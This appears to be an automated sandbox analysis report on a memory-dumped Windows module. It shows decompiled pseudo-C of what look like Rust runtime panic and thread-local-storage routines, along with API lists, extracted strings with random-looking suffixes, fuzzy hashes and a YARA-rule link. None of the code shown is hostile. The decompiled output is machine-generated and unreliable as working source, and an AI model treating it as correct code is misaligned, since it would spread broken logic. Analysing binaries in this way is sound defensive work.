C-Code - Quality: 69%

			E6ED1C700(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6ED239A0;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6ed6e120], esi");
				_t190 = E6ED1D000(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6ED395A0(_t264,  &M6ED5F8F7, 0x46, _t337,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed5f570;
						_v120 = 0x6ed5f824;
						_v68 = 0x6ed60260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ED12470;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6ED1D0F0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6ed6e128, 0, _t256);
							}
							_t194 = HeapFree( *0x6ed6e128, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6ed60224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed5f570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6ED1D0F0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6ed6e11c);
					_v144 = 0x6ed6e11c;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6ED1D000(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6ed6e110; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6ED1D380(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6ED395A0(_t264,  &M6ED5F8F7, 0x46, _t340,  &_v68, 0x6ed5f870, 0x6ed5f9bc);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6ed6d044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6ed6d044;
							_t202 = E6ED22960(_t264, 0x6ed6d044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6ed6d044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6ed6d044;
								_t203 = E6ED22960(_t264, 0x6ed6d044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6ed6e128; // 0x1390000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6ed6d044;
										_t332 = _t205;
										_t206 =  *0x6ed6d044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6ED22960(_t264, 0x6ed6d044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6ED392F0(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6ed6e128, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6ed6e110;
											 *0x6ed6e110 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6ed23290
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6ed6e128 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6ED1C640(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6ED395A0(_t264, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed5f860, 0x6ed5ff30);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6ED1C4D0(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6ED1C640(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6ed6010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6ed1dca0;
										_v60 =  &_v100;
										_v56 = 0x6ed1dca0;
										_v52 =  &_v148;
										_v48 = E6ED1DCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ED1D0F0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t245);
											}
											HeapFree( *0x6ed6e128, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed6e10c);
											_v68 = 0x6ed5fad0;
											_v64 = 1;
											_v152 = 0x6ed6e10c;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ED1DD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6ED1D0F0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed6e10c);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6ED1C640(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6ED1DA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed6e11c);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed6029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed5f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6ED1D0F0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6ED1D2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6ED1D290(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6ed6d040 = 0;
											_t356 =  *0x6ed6d040;
											if( *0x6ed6d040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6ed6017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed5f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ED1D0F0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6ed6e128, 0, _t235);
											}
											HeapFree( *0x6ed6e128, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}

0x6ed1c70c
0x6ed1c70f
0x6ed1c716
0x6ed1c71d
0x6ed1c722
0x6ed1c727
0x6ed1c730
0x6ed1c733
0x6ed1c739
0x6ed1c741
0x6ed1c746
0x6ed1c748
0x6ed1c762
0x6ed1c767
0x6ed1c76a
0x6ed1c76a
0x6ed1c76e
0x6ed1c771
0x6ed1c774
0x6ed1c776
0x6ed1c7ea
0x6ed1c7ed
0x6ed1c84a
0x6ed1c851
0x6ed1c85b
0x6ed1c862
0x6ed1c869
0x6ed1c86d
0x6ed1c874
0x6ed1c87b
0x6ed1c881
0x6ed1c884
0x6ed1c887
0x6ed1c88d
0x6ed1c894
0x6ed1c897
0x6ed1c89e
0x6ed1c8a3
0x6ed1c8a5
0x6ed1c8ac
0x6ed1c8b4
0x6ed1c8b7
0x6ed1c8b9
0x6ed1c8bc
0x6ed1c8bc
0x6ed1c8bf
0x6ed1c8c2
0x6ed1c8c6
0x6ed1c8c8
0x6ed1c8ca
0x6ed1c8ce
0x6ed1c8d0
0x6ed1c8d0
0x6ed1c8dc
0x6ed1c8dc
0x6ed1c8ea
0x6ed1c8ea
0x00000000
0x6ed1c8a5
0x6ed1c7f2
0x6ed1c7f5
0x6ed1c7fc
0x6ed1c803
0x6ed1c80a
0x6ed1c811
0x6ed1c815
0x6ed1c81c
0x6ed1c823
0x6ed1c828
0x6ed1c82a
0x00000000
0x6ed1c830
0x6ed1c835
0x6ed1c83d
0x6ed1c840
0x6ed1c842
0x00000000
0x6ed1c842
0x6ed1c77d
0x6ed1c77d
0x6ed1c785
0x6ed1c78b
0x6ed1c795
0x6ed1c79c
0x6ed1c7a3
0x6ed1c7a9
0x6ed1c7ac
0x6ed1c7af
0x6ed1c7b2
0x6ed1c7b5
0x6ed1c7ba
0x6ed1c7bd
0x6ed1c7bf
0x6ed1c8f3
0x6ed1c8f3
0x6ed1c8f6
0x6ed1c8f8
0x6ed1c9cb
0x6ed1c9d0
0x6ed1c9d3
0x6ed1c9d6
0x6ed1cbd7
0x00000000
0x6ed1cbd7
0x6ed1c9dc
0x6ed1c9df
0x6ed1cbd0
0x00000000
0x6ed1cbd0
0x6ed1c9e5
0x6ed1c9e7
0x00000000
0x00000000
0x6ed1c9f0
0x6ed1c9f5
0x6ed1c9f8
0x6ed1c9fb
0x6ed1c9fd
0x00000000
0x00000000
0x6ed1ca03
0x00000000
0x6ed1ca03
0x6ed1c8fe
0x00000000
0x6ed1c7c5
0x6ed1c7dd
0x6ed1c7e2
0x6ed1cbfe
0x6ed1cbfe
0x6ed1cc00
0x6ed1cc00
0x6ed1cc05
0x6ed1c933
0x6ed1c933
0x6ed1c936
0x6ed1c939
0x6ed1c940
0x6ed1c942
0x6ed1c947
0x6ed1c947
0x6ed1c94d
0x6ed1c956
0x6ed1ca33
0x6ed1ca33
0x6ed1ca38
0x6ed1ca3a
0x6ed1ca3c
0x6ed1ca41
0x6ed1ca41
0x6ed1ca47
0x6ed1ca4d
0x6ed1ca4f
0x6ed1cc0f
0x6ed1cc14
0x6ed1cc16
0x6ed1cc26
0x6ed1cc2b
0x6ed1cc30
0x6ed1cc32
0x6ed1cc72
0x6ed1cc78
0x6ed1cc7f
0x6ed1cc81
0x6ed1cc86
0x6ed1cc88
0x6ed1cc8f
0x6ed1cc92
0x6ed1cc97
0x6ed1cc97
0x6ed1cc9c
0x00000000
0x6ed1cc9c
0x6ed1cc34
0x6ed1cc3e
0x6ed1cc43
0x6ed1cc45
0x6ed1cc45
0x6ed1cc48
0x6ed1cc4b
0x6ed1cc4e
0x6ed1ccf8
0x6ed1ccfe
0x6ed1cd09
0x6ed1cd09
0x6ed1cd0e
0x6ed1cd0e
0x6ed1cd10
0x6ed1cd10
0x6ed1cd12
0x6ed1cd1d
0x6ed1cd1d
0x6ed1cd22
0x6ed1cd22
0x6ed1cd2d
0x6ed1cd35
0x6ed1cd38
0x6ed1cd3b
0x6ed1cd3b
0x6ed1cd3b
0x6ed1c901
0x6ed1c901
0x6ed1c907
0x6ed1c90a
0x6ed1c90a
0x6ed1c910
0x6ed1c913
0x6ed1c915
0x6ed1c923
0x6ed1c923
0x6ed1c925
0x6ed1ca0d
0x6ed1ca10
0x6ed1ca1e
0x6ed1ca20
0x00000000
0x00000000
0x6ed1ca26
0x6ed1ca29
0x6ed1ca2b
0x00000000
0x6ed1ca2b
0x6ed1c92b
0x6ed1c92e
0x6ed1c930
0x00000000
0x6ed1c930
0x6ed1cd00
0x6ed1cd02
0x00000000
0x6ed1cd02
0x6ed1cc54
0x6ed1cc57
0x00000000
0x00000000
0x6ed1cc5d
0x6ed1cc60
0x00000000
0x00000000
0x6ed1cc66
0x6ed1cc68
0x00000000
0x6ed1cc68
0x6ed1cc18
0x6ed1cc1d
0x6ed1cc1f
0x00000000
0x00000000
0x6ed1cc21
0x00000000
0x6ed1ca55
0x6ed1ca55
0x6ed1ca57
0x6ed1ca5a
0x6ed1cca2
0x6ed1cca2
0x6ed1cca5
0x6ed1cca8
0x6ed1cca8
0x6ed1ccab
0x6ed1ccb1
0x6ed1ccb8
0x6ed1ccbf
0x6ed1ccc5
0x6ed1ccc7
0x6ed1cccd
0x6ed1ccd0
0x6ed1ccd6
0x6ed1ccd6
0x6ed1ccd0
0x6ed1ccc7
0x00000000
0x6ed1ccbf
0x6ed1ca60
0x6ed1ca67
0x6ed1ca6e
0x6ed1ca6e
0x00000000
0x6ed1ca6e
0x6ed1c95c
0x6ed1c95f
0x6ed1c961
0x00000000
0x00000000
0x6ed1c967
0x6ed1c96a
0x6ed1c96d
0x6ed1cbf6
0x6ed1cbfb
0x00000000
0x6ed1cbfb
0x6ed1c973
0x6ed1c979
0x6ed1c97e
0x6ed1c980
0x6ed1c983
0x6ed1c98a
0x6ed1c98f
0x6ed1c992
0x6ed1c994
0x6ed1c997
0x6ed1c999
0x6ed1c99b
0x6ed1c99e
0x6ed1c9a0
0x6ed1c9a3
0x6ed1c9a3
0x6ed1c99e
0x6ed1c9a8
0x6ed1c9a8
0x6ed1c9ab
0x6ed1c9ae
0x6ed1c8ef
0x6ed1c8ef
0x6ed1c8f1
0x00000000
0x6ed1c9b4
0x6ed1c9b4
0x6ed1c9b8
0x6ed1c9bb
0x6ed1c9be
0x6ed1cce0
0x6ed1cce6
0x6ed1cce8
0x6ed1cceb
0x6ed1cea2
0x6ed1cea2
0x6ed1cea7
0x6ed1cea8
0x6ed1cea8
0x6ed1ca70
0x6ed1ca77
0x6ed1ca7e
0x6ed1ca85
0x6ed1ca8c
0x6ed1ca90
0x6ed1ca97
0x6ed1ca9e
0x6ed1caa5
0x6ed1caad
0x6ed1cab0
0x6ed1cab6
0x6ed1cab9
0x6ed1cabf
0x6ed1cac5
0x6ed1cacc
0x6ed1cad5
0x6ed1cadc
0x6ed1cae2
0x6ed1cae9
0x6ed1caec
0x6ed1cafa
0x6ed1cb01
0x6ed1cb09
0x6ed1cb0c
0x6ed1cb0e
0x6ed1cb11
0x6ed1cb14
0x6ed1cb1b
0x6ed1cb1d
0x6ed1cb23
0x6ed1cb25
0x6ed1cb25
0x6ed1cb31
0x6ed1cb31
0x6ed1cb3f
0x6ed1cb3f
0x6ed1cb44
0x6ed1cb55
0x6ed1cb5a
0x6ed1cd4b
0x6ed1cd5a
0x6ed1cd61
0x6ed1cd68
0x6ed1cd72
0x6ed1cd75
0x6ed1cd7c
0x6ed1cd83
0x6ed1cd89
0x6ed1cd90
0x6ed1cd93
0x6ed1cd9a
0x6ed1cd9f
0x6ed1cda8
0x6ed1cdae
0x6ed1cdb1
0x00000000
0x00000000
0x6ed1cdb8
0x6ed1cdc0
0x6ed1cdc3
0x6ed1cdc5
0x00000000
0x6ed1cb60
0x6ed1cb63
0x6ed1ce00
0x6ed1ce03
0x6ed1ce05
0x6ed1ce07
0x6ed1ce0a
0x6ed1ce0f
0x6ed1ce0f
0x6ed1ce0a
0x6ed1ce17
0x6ed1ce1d
0x6ed1ce23
0x6ed1ce25
0x6ed1ce27
0x6ed1ce2a
0x6ed1ce2f
0x6ed1ce2f
0x6ed1ce2a
0x6ed1ce39
0x6ed1ce3f
0x6ed1ce43
0x6ed1ce4a
0x6ed1ce52
0x6ed1ce59
0x6ed1ce60
0x6ed1ce67
0x6ed1ce6e
0x6ed1ce72
0x6ed1ce79
0x6ed1ce80
0x6ed1ce88
0x6ed1ce8b
0x6ed1ce8e
0x6ed1ce93
0x6ed1ce95
0x6ed1ce95
0x6ed1ce97
0x6ed1ce9b
0x6ed1cea0
0x00000000
0x6ed1cea0
0x6ed1cb6b
0x6ed1cb71
0x6ed1cb73
0x00000000
0x00000000
0x6ed1cb7c
0x6ed1cb7f
0x6ed1cb86
0x6ed1cb8d
0x6ed1cb94
0x6ed1cb9b
0x6ed1cba2
0x6ed1cbb0
0x00000000
0x00000000
0x6ed1cbbb
0x6ed1cbbe
0x6ed1cbc6
0x6ed1cbc8
0x6ed1cdc8
0x6ed1cdcb
0x6ed1cdd2
0x6ed1cddb
0x6ed1cddd
0x6ed1cddf
0x6ed1cddf
0x6ed1cdeb
0x6ed1cdeb
0x6ed1cdfb
0x00000000
0x6ed1cdfb
0x6ed1cb5a
0x6ed1ccf1
0x00000000
0x6ed1ccf1
0x6ed1c9c4
0x00000000
0x6ed1c9c4
0x6ed1c9ae
0x6ed1c956
0x6ed1c7bf

APIs

Part of subcall function 6ED1D000: TlsGetValue.KERNEL32(00000000,00000001,6ED1C746), ref: 6ED1D00B
Part of subcall function 6ED1D000: TlsGetValue.KERNEL32(00000000), ref: 6ED1D043

AcquireSRWLockShared.KERNEL32(6ED6E11C), ref: 6ED1C785
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1C8DC
HeapFree.KERNEL32(00000000,?), ref: 6ED1C8EA
TlsGetValue.KERNEL32(00000000), ref: 6ED1C94D
TlsGetValue.KERNEL32(00000000), ref: 6ED1CA47
HeapFree.KERNEL32(00000000,00000000), ref: 6ED1CB31
HeapFree.KERNEL32(00000000,?), ref: 6ED1CB3F
GetProcessHeap.KERNEL32 ref: 6ED1CC18
HeapAlloc.KERNEL32(01390000,00000000,00000010), ref: 6ED1CC2B
TlsSetValue.KERNEL32(00000000,00000000,01390000,00000000,00000010), ref: 6ED1CC9C
HeapFree.KERNEL32(00000000,00000000,01390000,00000000,00000010), ref: 6ED1CD1D

Strings

already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6ED1CBE1
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ED1CC00
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ED1C74D, 6ED1C7C8
full, xrefs: 6ED1CCF8

Memory Dump Source

Source File: 00000000.00000002.695699274.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000000.00000002.695686015.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695729571.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.695782032.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.695800005.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.695816014.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeValue$AcquireAllocLockProcessShared
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
API String ID: 2275035175-262129955
Opcode ID: bbf3c7538959b8ef0d44b11209ff677035f5c459abc4cf973998809cf79ac7e1
Instruction ID: 29d5bfc0d758e93d98bf65d97bc2dc98720fdb1e5898426b53c1bf40b777299f
Opcode Fuzzy Hash: bbf3c7538959b8ef0d44b11209ff677035f5c459abc4cf973998809cf79ac7e1
Instruction Fuzzy Hash: 971226B4A08219CFEB14CFE4D8947DEBBB5BB49308F204529D815AF380D775A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C6D0, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ED1C6D0(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6ED239A0;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6ed601dc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6ed6e120], esi");
				_t193 = E6ED1D000(_t268, 0x6ed601dc);
				_t349 = _t193;
				if(_t193 == 0) {
